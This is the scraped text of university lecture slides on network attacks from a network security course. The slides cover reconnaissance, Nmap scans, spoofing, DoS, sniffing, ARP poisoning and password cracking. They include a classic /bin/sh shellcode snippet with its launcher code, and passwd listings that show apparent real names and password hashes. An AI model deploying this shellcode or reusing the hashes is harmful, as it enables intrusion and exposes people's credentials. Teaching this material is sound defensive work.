Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Lecture2 network attack


Published on

Published in: Technology, Business
  • Be the first to comment

Lecture2 network attack

  1. 1. How-to attack a computer network Lecture 2 Raja M. Khurram Shahzad
  2. 2. The Internet The elements of the Internet: Router PCs, workstation • A lot of hardware and software Server Mobile International Hosts, end-systems ISP • Millions of interconnected computing devices all over the Apartments world (a global network) ë Local ISP PCs, workstations, servers… National ISP PDAs, phones, TV-boxes… • Hosts runs Network applications s WWW email Company file transfer network remote login multimedia … 2FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  3. 3. The Internet Routers Router PCs, workstation • Interconnects hosts and networks • switching devices (nodes) Server Mobile International • forward data packets between ISP hosts through the networks Apartments • Store and forward technique Local ISP Other network nodes: National ISP • Bridges • Switches • Repeaters Company • Amplifiers network • ... different functionality and degree of intelligence 3FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  4. 4. The Internet Protocols • All communicating devices on the Router PCs, workstation Internet run protocols Server Mobile International • Protocols controls the sending and ISP receiving of information - Ex: TCP, IP, HTTP, FTP… Apartments • The collection of Internet Local ISP protocols: TCP/IP National ISP - Are implemented in all devices on the Internet (all or part of it) - hosts, routers… Company network ISPs (Internet Service Providers) • selling communication- and access services 4 to end users and networksFREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  5. 5. The Internet The Internet • A global “network of networks” Router PCs, workstation - Both public and private networks of different technologies and performance International Server Mobile IP-protocol: ISP • carries “everything” (applications/ services) Apartments • over “anything“ (different network Local ISP technologies) • ..half truth !? (high quality multimedia, National ISP real-time applications is still a pain!?) • Packet switching • no dedicated resources in the network • …shared! Company • Best-effort services network 5FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  6. 6. The Internet What holds the Internet together? Router PCs, workstation •The “glue” Server Mobile International Addressing ISP how to refer to a device Routing Apartments how to get there Local ISP IP-protocol National ISP what to speak to be understood Internet standards Company network RFC: Request for comments IETF: Internet Engineering Task Force 6FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  7. 7. The Internet The structure of Internet • Loosely hierarchical Router PCs, workstation • Hosts are connected to local ISPs through access networks Server Mobile International - dial phone line: modem, ADSL, ISP ISDN, cable-modem… Apartments - company/campus network Local ISP - leased lines • Local ISPs connected to national ISPs National ISP • National ISPs connected to international (global) ISPs • The main point is : Company - new hosts and networks can be added…without changing the network existing implementation of Internet (should scale!?) 7FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  8. 8. Protocols in the TCP/IP Suite 8FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  10. 10. Information Gathering • Find out initial information Open Source: general information about a company that anyone can obtain whois (unix), sam spade (third-party tool for windows) nslookup • Find out address range of the network ARIN (American registry for Internet numbers) – whois -h arin-net Traceroute • Find active machines: ping 12FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  11. 11. Information Gathering cont. • Find open ports or access points: Nmap for UNIX ScanPort for Windows War Dialers: Programs that find modems on a network – THC-Scan for Windows • Figure out the operating system Queso Nmap 13FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  12. 12. Information Gathering cont. • Map out the network Cheops Visual ping Traceroute • Figure out which services are running on each port Default port and OS Telnet Vulnerability scanners: programs that can be run against a site that give a hacker a list of vulnerabilities on the target host – SAINT – NESSUS 14FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  13. 13. TCP three-way handshake SYN with ISNa ACK ISNa and SYN with ISNb ACK ISNb Connection Connection 15FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  14. 14. Types of Nmap scans • TCP Connect Scan: Attempts to complete the TCP three-way handshake and set up a connection Easy to detect • TCP SYN Scans: “half-open scans” Sends a SYN to each target port. Target sends SYN-ACK if the port is open. The attacker send a RESET packet to abort the connection. Hard to detect, only routers or firewalls will log (if enabled) the attackers IP. • FIN Scan: Violate the TCP specification by sending unexpected packets at the start of a connection Attacker sends FIN packet, if the target port is closed a RESET packet is sent back, if open nothing is sent back. • Ack Scan: Sends an ACK packet to targets port. If RESET comes back from target Nmap will classify the port as “unfiltered” otherwise “filtered” 16FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  15. 15. Types of Spoofing • IP spoofing: An attacker uses an IP address of another computer to acquire information or gain access • Email spoofing: In essence, the email looks like it came from John, but in reality, John didn’t send the email. Someone who was impersonating John send it. • Web spoofing: Whenever an entity has to be trusted, the opportunity for spoofing arises. • Non-technical spoofing: These types of attacks concentrate on compromising the human element of a company.This is done through social engineering techniques. 17FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  16. 16. IP Spoofing. • The intruder sends messages to a computer with an IP address indicating that the message is coming from a trusted host. • A hacker must find an IP address of a trusted host and then modify the packet headers so that it appears that the packets are coming from that host. From ad dress: 1 Attacker To addre 0.10.20. ss: 10.1 20 0.5.5 Replies sent back to John Spooft adress 18FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  17. 17. Denial of Service Attack. • DoS: A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. • Two general types of DoS attacks: 1. Crashing a system or a network: The attacker can send a victim data or packets it is not expecting This attack requires little to perform and human interaction to fix 2. Flooding the system or network with so much information that it cannot respond: This attack requires more energy from the attacker, recovering requires minimal human intervention 19FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  18. 18. Distributed Denial of Service Attack. • DDoS: Several machines are coordinated to launch an attack against a target machine or network at the same time Attacker System in System in System in System in Kina USA Iran Europe 20 VictimFREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  19. 19. DoS • Ping of Death • SSPing • Land • Smurf • Win Nuke • CPU Hog • SYN Flood 21FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  20. 20. Buffer overflow #include <stdio.h> sample_function(char *string){ char buffer[16]; Local buffer can hold 16 characters strcpy(buffer, string); strcpy loads characters into buffer until it return;} finds the end of the string main (){ Create buffer that can hold 256 characters char big_buffer [256]; int i; for (i=0; i<255; i++){ big_buffer[i]=A; } Shove the character A into the buffer 255 times sample_function (big_buffer); Sent big_buffer to sample_function 22FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  21. 21. Buffer Overflow Attack • A buffer overflow attack is when an attacker tries to store too much information in an undersized receptacle. • Most of the newest exploits are based on buffer overflow attack • Takes advantage of applications that do not adequately parse input by stuffing too much data into undersized receptacles. • Can cause attacks against all three areas to security: 1. Attack against availability 2. Attack against integrity 3. Attack against confidentiality 23FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  22. 22. How does it work? Fill direction . . Bottom . .Of memory . . Buffer overwritten Machine Code Buffer with instructions execv /bin/sh Saved frame PTR Saved frame PTR Return Pointer New PTR to EXEC code Return PTR is overwritten Function Call Function Call Arguments Arguments . . Top . .Of memory . . 24FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  23. 23. Example • Some different buffer overflow attacks: NetMeeting Buffer Overflow Outlook Buffer Overflow Linuxconf Buffer Overflow IIS 4.0/5.0 Phone Book Server Buffer Overflow char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;} 25FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  24. 24. Sniffing • A program that gather traffic from the local network • Used by both attackers and network administrators • Gathers packets at the Data Link layer • An attacker must haven account on a machine in order to run the sniffer program. • Sniffing tools available: tcpdump windump Wireshark (ethereal) Dsniff 26FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  25. 25. Passive Sniffing et a ck p packet HUB packet pa ck et 27FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  26. 26. Active Sniffing • Two methods for sniffing data from a switched LAN 1. MAC flooding 2. Spoofed ARP Messages packet Switch packet Default packet router Internet 28FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  27. 27. Spoofed ARP Message Configure IP Forwarding to send packets to the default router Send fake ARP response to remap default router IP adressto attacker´s Attacker sniffs the traffic MAC address Switch Packets are forwarded from the Victim traffic destined attackers machine to the actual For the outside world. default router for delivery to the Based on the poisoned outside world ARP table, traffic is really sent to the attackers MAC Default address router Internet 29FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  28. 28. Island Hopping Attack
  29. 29. Passwords • Most common weaknesses in a company 1. weak passwords 2. uncontrolled modems on the network • Most systems and software have default passwords! • Characteristics of a strong password Changes every 45 days Minimum length of 10 characters Contain at leas one alpha, one number and one special character Cannot contain dictionary words Cannot reuse the previous five passwords Minimum password age of 10 days After 5 failed logon attempts, password is locked for serveral hours 31FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  30. 30. Passwords cont. • System maintain a file that associates a password with each authorised user. • Password file can be protected with: One-way encryption Access Control • Techniques for guessing passwords: Try default passwords. Try all short words, 1 to 3 characters long. Try all the words in an electronic dictionary (60,000). Collect information about the user’s hobbies, family names, birthday, etc. Try user’s phone number, social security number, street address, etc. Try all license plate numbers (MUP103). Use a Trojan horse Tap the line between a remote user and the host system. 32FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  31. 31. UNIX passwords • Stored in file /etc/passwd is world readable (any user who was on the system had access to read the file i.e. more /etc/passwd ) usernamen:password:UID:GID:full name:home directory:shell sch:OZFGkH258h8yg:1013:10:Stefan Chevul:/home/sch/:/bin/csh • Latest UNIX versions split the passwd file into 2 files. The /etc/passwd file still exists, it contains everything except the encrypted passwords. This is stored in the /etc/shadow file. usernamen:password:last:min:max:warning:expire:disable sch:OZFGkH258h8yg::::::: 33FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  32. 32. ypcat passwd gymsjo:PgiEmZuEHpmY2:3227:3200:STEFAN JOHANSSON:/home/ dogmatix/gym/gymsjo:/usr/local/bin/tcsh frpe03:EoFPa/t0McqN6:470078:20031:FREDRIK PERSSON:/home/ dogmatix/students/20031/frpe03:/usr/local/bin/tcsh etmf01:Ck34HVjHPI3gQ:740030:20011:Etienne Mfoumou:/home/ dogmatix/students/20011/etmf01:/usr/local/bin/tcsh rope05:i/mTnW1jL7vmM:490146:20051:ROBIN PERSSON:/home/ obelix/students/20051/rope05:/usr/local/bin/tcsh nasc04:HfcXJTuIB7Bh2:500001:20041:Nadzida Saric:/home/obelix/ students/20041/nasc04:/usr/local/bin/tcsh 34FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  33. 33. cat passwd root:x:0:0:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: smmsp:x:25:25:SendMail Message Submission Program:/: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: 35FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  34. 34. Salt • The salt serves three purposes: Prevents duplicate passwords. Effectively increases the length of the password. Prevents the use of hardware implementations of DES 36FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  35. 35. UNIX Password Scheme I salt password Password File 12 bits 56 bits User id salt E(pwd, [salt, 0]) • Load • crypt (3) 11 characters • (a) Loading a new password 37FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  36. 36. UNIX Password Scheme II 38 ET2437 - Network Security
  37. 37. Passwords cracking • Password cracking = guessing someone´s password from the encrypted password • General algorithm used for automated password cracking: 1. Find valid user IDs 2. Find the encryption algorithm used 3. Obtain encrypted passwords 4. Create a list of possible passwords 5. Encrypt each word 6. See if there is a match for each user ID 7. Repeat steps 1 through 5 39FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  38. 38. Why is Passwords cracking important? • From a security standpoint, password cracking can help you build and maintain a more secure system. • Reasons why password cracking is useful To audit the strength of passwords To recover forgotten / unknown passwords To migrate users To use as a checks and balance system • Main types of password cracking attacks: Dictionary attacks Brute force attacks Hybrid attacks 40FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  39. 39. Types of Passwords Attacks Dictionary Brute Force Hybrid attack attack attack Speed of the Fast Slow Medium attack Amount of Finds only Finds every Finds only passwords words password passwords that have a cracked dictionary word as the base 41FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  40. 40. Passwords cracking programs • NT password cracking programs: L0phtcrack NTSweep NTCrack PWDump2 • UNIX password crackers: Crack John the Ripper XIT Slurpie 42FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY
  41. 41. Covering the Tracks • After an attacker has gained access and accomplished what he wanted to do, one of the last steps he performs is covering his tracks, hiding evidence that he was ever there. • To do this there are 4 main areas an attacker is concerned with: 1. Log files 2. File information 3. Additional files 4. Network traffic 43FREDRIK ERLANDSSON ET2437 - NETWORK SECURITY